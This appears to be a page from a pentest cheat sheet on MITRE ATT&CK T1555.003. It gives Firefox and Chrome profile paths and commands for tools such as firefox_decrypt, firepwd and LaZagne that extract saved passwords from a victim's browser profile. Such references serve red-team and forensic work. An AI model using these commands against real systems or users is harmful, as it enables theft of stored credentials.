Web Browsers
MITRE ATT&CK™ Credentials from Password Stores: Credentials from Web Browsers - Technique T1555.003
Theory
Practice
Firefox
/home/<Username>/.mozilla/firefox/xxxx.defaultpython3 firefox_decrypt.py <Victime_ProfileFolder>C:\Users\<Username>\AppData\Roaming\Mozilla\Firefox\Profiles\xxxx.defaultFirepwd
# Decrypt
python firepwd.py -d <Victime_ProfileFolder>
# Provide user's password (if secrests are encrypted using DPAPI)
python firepwd.py -d <Victime_ProfileFolder> -p <Password>LaZagne
PS> laZagne.exe browsers [-password P@ssword!]LaZagneForensic
python laZagneForensic.py browsers -local /tmp/disk -password 'Password'Google Chrome
/home/<Username>/.config/google-chrome/defaultpython chrome.pyC:\Users\<Username>\AppData\Local\Google\Chrome\User Data\DefaultLaZagne
PS> laZagne.exe browsers -password P@ssword!Decrypt-Chrome-Passwords
PS> python decrypt_chrome_password.pyChrome-Decrypter
PS> .\chrome_decrypt.exeLaZagneForensic
python laZagneForensic.py browsers -local /tmp/disk -password 'Password'Last updated